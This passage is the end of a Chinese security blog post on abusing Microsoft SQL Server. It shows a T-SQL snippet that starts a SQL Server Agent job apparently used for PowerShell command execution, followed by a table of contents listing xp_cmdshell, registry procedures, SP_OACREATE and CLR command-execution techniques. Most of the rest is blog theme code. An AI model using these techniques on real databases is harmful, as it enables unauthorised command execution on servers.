punctuation">.</span>sp_add_jobserver <span class="token variable">@job_name</span> <span class="token operator">=</span> N<span class="token string">'test_powershell_job1'</span><span class="token punctuation">;</span> 
<span class="token keyword">EXEC</span> dbo<span class="token punctuation">.</span>sp_start_job N<span class="token string">'test_powershell_job1'</span><span class="token punctuation">;</span></code></pre>

<h1 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h1><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/9475">https://xz.aliyun.com/t/9475</a></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/posts/1385ebc" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>上一页</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
              2022-03-20 20:49:34
            </span>
            
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="标签"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/MSSQL/" title="MSSQL">
                        #MSSQL
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
              <a href="/posts/53b8e68" target="_self">
                <span>下一页</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">目录</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%AE%80%E4%BB%8B"><span class="toc-text">简介</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8D%B1%E9%99%A9%E7%9A%84%E5%AD%98%E5%82%A8%E8%BF%87%E7%A8%8B"><span class="toc-text">危险的存储过程</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#xp-cmdshell"><span class="toc-text">xp_cmdshell</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E8%AF%A2-xp-cmdshell-%E5%AD%98%E5%82%A8%E8%BF%87%E7%A8%8B%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8"><span class="toc-text">查询 xp_cmdshell 存储过程是否存在</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#xp-cmdshell-%E7%9A%84%E5%BC%80%E5%90%AF%E4%B8%8E%E5%85%B3%E9%97%AD"><span class="toc-text">xp_cmdshell 的开启与关闭</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%81%A2%E5%A4%8D-xp-cmdshell-%E5%AD%98%E5%82%A8%E8%BF%87%E7%A8%8B"><span class="toc-text">恢复 xp_cmdshell 存储过程</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9B%B8%E5%85%B3%E6%93%8D%E4%BD%9C"><span class="toc-text">注册表相关操作</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#xp-regread-%E8%AF%BB%E6%B3%A8%E5%86%8C%E8%A1%A8"><span class="toc-text">xp_regread 读注册表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#xp-regaddmultistring-%E6%9E%9A%E4%B8%BE%E5%8F%AF%E7%94%A8%E7%9A%84%E6%B3%A8%E5%86%8C%E8%A1%A8%E9%94%AE%E5%80%BC"><span class="toc-text">xp_regaddmultistring 枚举可用的注册表键值</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#xp-regwrite-%E4%BF%AE%E6%94%B9%E6%B3%A8%E5%86%8C%E8%A1%A8"><span class="toc-text">xp_regwrite 修改注册表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#xp-regdeletekey-%E5%88%A0%E9%99%A4%E6%8C%87%E5%AE%9A%E6%B3%A8%E5%86%8C%E8%A1%A8%E9%94%AE%E5%80%BC%E5%AF%B9"><span class="toc-text">xp_regdeletekey 删除指定注册表键值对</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#xp-fileexist"><span class="toc-text">xp_fileexist</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#xp-subdirs"><span class="toc-text">xp_subdirs</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#xp-getnetname"><span class="toc-text">xp_getnetname</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#xp-msver"><span class="toc-text">xp_msver</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL-Server-COM-%E7%BB%84%E4%BB%B6"><span class="toc-text">SQL Server COM 组件</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9F%A5%E8%AF%A2-SP-OACREATE-%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8"><span class="toc-text">查询 SP_OACREATE 是否存在</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SP-OACREATE-%E7%9A%84%E5%BC%80%E5%90%AF%E4%B8%8E%E5%85%B3%E9%97%AD"><span class="toc-text">SP_OACREATE 的开启与关闭</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%89%A7%E8%A1%8C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4"><span class="toc-text">执行系统命令</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL-Server-CLR-%E7%9B%B8%E5%85%B3%E5%88%A9%E7%94%A8"><span class="toc-text">SQL Server CLR 相关利用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BC%96%E5%86%99-CLR"><span class="toc-text">编写 CLR</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%AF%E7%94%A8-CLR"><span class="toc-text">启用 CLR</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL-Server-2017-%E7%89%88%E6%9C%AC%E4%B9%8B%E5%89%8D"><span class="toc-text">SQL Server 2017 版本之前</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL-Server-2017-%E7%89%88%E6%9C%AC%E5%8F%8A%E4%B9%8B%E5%90%8E"><span class="toc-text">SQL Server 2017 版本及之后</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A8%8B%E5%BA%8F%E9%9B%86%E7%9A%84%E5%AF%BC%E5%85%A5%E5%92%8C%E5%88%9B%E5%BB%BA"><span class="toc-text">程序集的导入和创建</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8-CLR-%E6%89%A7%E8%A1%8C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4"><span class="toc-text">利用 CLR 执行系统命令</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A0%E9%99%A4%E5%AD%98%E5%82%A8%E8%BF%87%E7%A8%8B%E3%80%81%E7%A8%8B%E5%BA%8F%E9%9B%86%E4%BB%A5%E5%8F%8A%E5%8F%97%E4%BF%A1%E4%BB%BB%E7%9A%84%E5%93%88%E5%B8%8C%E5%80%BC"><span class="toc-text">删除存储过程、程序集以及受信任的哈希值</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL-Server-2017-%E4%B9%8B%E5%89%8D%E7%9A%84%E7%89%88%E6%9C%AC"><span class="toc-text">SQL Server 2017 之前的版本</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL-Server-2017-%E5%8F%8A%E6%9B%B4%E9%AB%98%E7%89%88%E6%9C%AC"><span class="toc-text">SQL Server 2017 及更高版本</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E7%94%A8"><span class="toc-text">通用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WarSQLKit"><span class="toc-text">WarSQLKit</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL-Server-Agent-Job-%E4%BB%A3%E7%90%86%E6%89%A7%E8%A1%8C%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E5%88%A9%E7%94%A8"><span class="toc-text">SQL Server Agent Job 代理执行计划任务利用</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E7%AB%A0"><span class="toc-text">参考文章</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/Zh0um1">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2022 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="搜索...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>首次搜索，正在载入索引文件，请稍后……<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容，请尝试更换检索词。<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>未找到search.xml文件，具体请参考：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>请求失败，尝试重新刷新页面或稍后重试。<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + MSSQL%20%E4%B8%80%E8%88%AC%E5%88%A9%E7%94%A8%E6%96%B9%E5%BC%8F + '&url=' + http%3A%2F%2Fzh0um1.github.io%2Fposts%2F5beaca16 + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://zh0um1.github.io/posts/5beaca16" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
